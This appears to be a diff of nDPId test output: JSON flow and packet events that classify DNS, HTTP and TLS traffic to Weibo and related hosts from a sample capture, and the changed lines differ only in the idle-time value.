00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":42,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071551,"flow_last_seen":1463089071612,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1463089071612,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"www.weibo.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.137"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071613,"flow_last_seen":1463089071613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089071613,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1463089071613,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089071613,"pkt":"kDVu60UQeJKcD6iOCABFAAA84VFAAEAGsxPAqAFpXbyGicnyAFB0WekZAAAAAKACchD\/WQAAAgQFtAQCCAoAQQhIAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1463089071642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089071642,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGnGVdvIaJwKgBaQBQyfKlqmMtdFnpGqAS\/\/8RHAAAAgQFqAQCCAr5u121AEEISAEDAwc="} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1463089071642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071642,"pkt":"kDVu60UQeJKcD6iOCABFAAA04VJAAEAGsxrAqAFpXbyGicnyAFB0WekapapjLoAQAOU+7wAAAQEICgBBCFD5u121"} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089071613,"flow_last_seen":1463089071642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1463089071642,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071730,"flow_last_seen":1463089071730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089071730,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1463089071730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071730,"pkt":"kDVu60UQeJKcD6iOCABFAAA08m9AAEAG2cLAqAFp2DrURZOqAbsjKGR2xs8noYAQA+RthAAAAQEICgBBCGYlk10U"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1463089071755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071755,"pkt":"eJKcD6iOkDVu60UQCABFAAA0StsAADYGy1fYOtRFwKgBaQG7k6rGzyehIyhkd4AQAsDqzAAAAQEICiWUDPAAQNxk"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071994,"flow_last_seen":1463089071994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089071994,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1463089071994,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071994,"pkt":"kDVu60UQeJKcD6iOCABFAAA06TdAAEAGtMfAqAFpNuGj0p34AbsDr1KJWj28A4AQAWjCCQAAAQEICgBBCKgBIwBO"} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072046,"flow_last_seen":1463089072046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089072046,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1463089072046,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072046,"pkt":"kDVu60UQeJKcD6iOCABFAAA0dEpAAEAGV+zAqAFp2DrUQYeLAbv4qaw1BowayYAQAO03NAAAAQEICgBBCLUlGFKF"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1463089072070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072070,"pkt":"eJKcD6iOkDVu60UQCABFAAA0NhEAADYG4CXYOtRBwKgBaQG7h4sGjBrJ+KmsNoAQAV6y1gAAAQEICiUZAmMAQNzC"} 
-00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1463089071613,"flow_last_seen":1463089072125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":455,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089072125,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1463089072138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072138,"pkt":"eJKcD6iOkDVu60UQCABFAAA0XohAABsGZHc24aPSwKgBaQG7nfhaPbwDA69SioAQAIjCywAAAQEICgEjLGEAQNyy"} -00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":83,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1463089071613,"flow_last_seen":1463089072285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":12516,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1463089072285,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071613,"flow_last_seen":1463089071613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089071613,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1463089071613,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089071613,"pkt":"kDVu60UQeJKcD6iOCABFAAA84VFAAEAGsxPAqAFpXbyGicnyAFB0WekZAAAAAKACchD\/WQAAAgQFtAQCCAoAQQhIAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1463089071642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089071642,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGnGVdvIaJwKgBaQBQyfKlqmMtdFnpGqAS\/\/8RHAAAAgQFqAQCCAr5u121AEEISAEDAwc="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1463089071642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071642,"pkt":"kDVu60UQeJKcD6iOCABFAAA04VJAAEAGsxrAqAFpXbyGicnyAFB0WekapapjLoAQAOU+7wAAAQEICgBBCFD5u121"} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089071613,"flow_last_seen":1463089071642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1463089071642,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071730,"flow_last_seen":1463089071730,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089071730,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1463089071730,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071730,"pkt":"kDVu60UQeJKcD6iOCABFAAA08m9AAEAG2cLAqAFp2DrURZOqAbsjKGR2xs8noYAQA+RthAAAAQEICgBBCGYlk10U"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1463089071755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071755,"pkt":"eJKcD6iOkDVu60UQCABFAAA0StsAADYGy1fYOtRFwKgBaQG7k6rGzyehIyhkd4AQAsDqzAAAAQEICiWUDPAAQNxk"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071994,"flow_last_seen":1463089071994,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089071994,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1463089071994,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071994,"pkt":"kDVu60UQeJKcD6iOCABFAAA06TdAAEAGtMfAqAFpNuGj0p34AbsDr1KJWj28A4AQAWjCCQAAAQEICgBBCKgBIwBO"} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072046,"flow_last_seen":1463089072046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089072046,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1463089072046,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072046,"pkt":"kDVu60UQeJKcD6iOCABFAAA0dEpAAEAGV+zAqAFp2DrUQYeLAbv4qaw1BowayYAQAO03NAAAAQEICgBBCLUlGFKF"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1463089072070,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072070,"pkt":"eJKcD6iOkDVu60UQCABFAAA0NhEAADYG4CXYOtRBwKgBaQG7h4sGjBrJ+KmsNoAQAV6y1gAAAQEICiUZAmMAQNzC"} 
+00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1463089071613,"flow_last_seen":1463089072125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":455,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089072125,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1463089072138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072138,"pkt":"eJKcD6iOkDVu60UQCABFAAA0XohAABsGZHc24aPSwKgBaQG7nfhaPbwDA69SioAQAIjCywAAAQEICgEjLGEAQNyy"} +00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":83,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1463089071613,"flow_last_seen":1463089072285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":12516,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1463089072285,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072333,"flow_last_seen":1463089072333,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1463089072333,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1463089072333,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1463089072333,"pkt":"kDVu60UQeJKcD6iOCABFAAA9J7BAAEARj0XAqAFpwKgBAdEnADUAKd+0rc0BAAABAAAAAAAAA2ltZwF0BnNpbmFqcwJjbgAAAQAB"} 00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072333,"flow_last_seen":1463089072333,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1463089072333,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"img.t.sinajs.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1463089072444,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1463089072444,"pkt":"eJKcD6iOkDVu60UQCABFAACxAABAAEARtoHAqAEBwKgBaQA10ScAnYbirc2BgAABAAUAAAAAA2ltZwF0BnNpbmFqcwJjbgAAAQABwAwABQABAAAAAAAHBHdjZG7AEsAtAAUAAQAAACoAFQZzaW5hanMFY3NnbGIFdHhjZG7AGcBAAAUAAQAABBMAFAhuNGNzd2hrMwVnY2NkbgNuZXQAwGEAAQABAAAABAAEXbyG9sBhAAEAAQAAAAQABF28hvE="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072333,"flow_last_seen":1463089072444,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1463089072444,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"img.t.sinajs.cn","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.246"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1463089072445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072445,"pkt":"kDVu60UQeJKcD6iOCABFAAA8AXdAAEAGkoHAqAFpXbyG9ovbAFCLeghvAAAAAKACchAFvgAAAgQFtAQCCAoAQQkYAAAAAAEDAwc="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1463089072445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072445,"pkt":"kDVu60UQeJKcD6iOCABFAAA8fClAAEAGF8\/AqAFpXbyG9ovcAFB8ZHUxAAAAAKACchCoEAAAAgQFtAQCCAoAQQkYAAAAAAEDAwc="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 